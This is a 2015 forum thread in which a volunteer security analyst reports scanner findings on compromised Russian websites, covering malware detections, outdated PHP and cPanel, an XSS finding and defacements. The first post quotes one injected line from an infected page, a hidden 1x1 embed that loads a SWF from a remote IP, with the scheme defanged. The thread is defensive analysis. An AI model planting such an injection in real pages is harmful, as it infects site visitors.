Author Topic: Website only blacklisted or with malware?  (Read 2664 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
Website only blacklisted or with malware?
« on: March 15, 2015, 04:02:03 PM »
See: https://www.virustotal.com/nl/url/e5069e31d176875df807108e450b5c1f5f267ff57434ad62ec4c1f6fdce964c7/analysis/#additional-info
See: http://killmalware.com/dubs.ru/
Sucuri detects malware: ISSUE DETECTED   DEFINITION   INFECTED URL
Website Malware   MW:JS:GEN2?web.html.flash-injection.001   -http://www.dubs.ru/
Website Malware   MW:JS:GEN2?web.html.flash-injection.001   -http://www.dubs.ru/404testpage4525d2fdc
Website Malware   MW:JS:GEN2?web.html.flash-injection.001   -http://www.dubs.ru/404javascript.js
Website Malware   MW:JS:GEN2?web.html.flash-injection.001   -http://www.dubs.ru/?page_id=741
Website Malware   MW:JS:GEN2?web.html.flash-injection.001   -http://www.dubs.ru/?page_id=739
Website Malware   MW:JS:GEN2?web.html.flash-injection.001   -http://www.dubs.ru/?page_id=740
Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.html.flash-injection.001
<embed  src="htxp://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1">
43 malicious files detected by Quttera's: Detected reference to malicious blacklisted domain www.dubs.ru, referencing to a Quttera's blacklisted domain. Blacklisted: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=dubs.ru
PHP version's security vulnerabilities":
http://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/version_id-178361/PHP-PHP-5.5.20.html
Vulnerability and malcode on plug-in: htxp://www.dubs.ru/vk.com/js/api/openapi.js/?97/ - vulnerable to K7AntiVirus, Exploit
( 04c5605f1 ) -> http://jsunpack.jeek.org/?report=196607f6e7ae5fb8ca08488b52334902178c747f - length extension attack via bot miners!

General IP badness history: https://www.virustotal.com/nl/ip-address/5.101.152.42/information/

polonus (volunteer website security analyst and website error-hunter)

For a tracker tracker report from external links on website see attached report - do not try to open links up in a common browser - they are just been given as a harmless txt file (pol)
« Last Edit: March 29, 2015, 04:59:00 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
Re: Website only blacklisted or with malware?
« Reply #1 on: March 21, 2015, 04:27:53 PM »
Update: http://killmalware.com/dubs.ru/# still a threat.
Google considers website as harmful.
See: htxp://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fwww.dubs.ru%2F&useragent=Fetch+useragent&accept_encoding=
XSS vuln.: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.dubs.ru%2Fxmlrpc.php
Attached tracker tracker report - do not open links inside a browser. Info for research purposes only.

polonus

« Last Edit: March 21, 2015, 04:39:09 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
Re: Website only blacklisted or with malware?
« Reply #2 on: April 04, 2015, 05:18:31 PM »
Update: See: http://killmalware.com/websitevenue.ru/
Re: http://www.leakedin.com/2015/03/08/potential-leak-of-data-hacking-notification-3530/
Re: http://pastebin.com/raw.php?i=A9tfN6Dj
Web application details:
Running cPanel 11.36.0.21: -websitevenue.ru:2082
cPanel version 11.36.0.21 outdated: Upgrade required.
Outdated cPanel Found: cPanel 11.36.0.21

The defacer's signature was found in 15 websites: http://evuln.com/labs/hackedby/57507/

pol
« Last Edit: April 04, 2015, 05:21:38 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
Re: Website only blacklisted or with malware?
« Reply #3 on: April 04, 2015, 05:36:59 PM »
For the majority of the defaced websites via logol dot ru, see the security header situation there:
Tragic - security headers all missing and one with a warning.
Server is not following best policies on configuration, ispmanager external cloud log-in import bug not patched?
Questions, questions, but we find various defacements here.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!